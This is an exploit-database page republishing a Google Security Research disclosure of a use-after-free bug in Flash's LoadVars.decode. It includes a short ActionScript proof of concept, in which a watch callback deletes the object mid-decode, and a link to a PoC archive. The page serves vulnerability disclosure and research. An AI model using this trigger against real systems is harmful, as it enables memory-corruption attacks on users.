Use-After-Free in LoadVars.decode

vendor:

N/A

by:

Google Security Research

N/A

CVSS

N/A

Use-After-Free

N/A

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Chrome on 64-bit Ubuntu

2020

Use-After-Free in LoadVars.decode

There is a use-after-free in LoadVars.decode. If a watch is set on the object that the parameters are being decoded into, and the watch deletes the object, then other methods are called on the deleted object after it is freed. A PoC is as follows: var lv = new LoadVars(); var f = lv.decode; var tf = this.createTextField('tf',1, 2, 3, 4, 5); tf.natalie = 'not test'; tf.watch('natalie', func); f.call(tf, 'natalie=test&bob=1'); trace(tf.natalie); function func(){ trace('here'); tf.removeTextField(); return 'test'; }

Mitigation:

N/A

Source

Exploit-DB raw data:

Source: https://code.google.com/p/google-security-research/issues/detail?id=667

There is a use-after-free in LoadVars.decode. If a watch is set on the object that the parameters are being decoded into, and the watch deletes the object, then other methods are called on the deleted object after it is freed. A PoC is as follows:

var lv = new LoadVars();
var f = lv.decode;
var tf = this.createTextField("tf",1, 2, 3, 4, 5);
tf.natalie = "not test";
tf.watch("natalie", func);
f.call(tf, "natalie=test&bob=1");
trace(tf.natalie);


function func(){
	
	trace("here");
	tf.removeTextField();	
	return "test";

	}
	

A sample swf and fla are attached. This issue was reproduced in Chrome on 64-bit Ubuntu.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39463.zip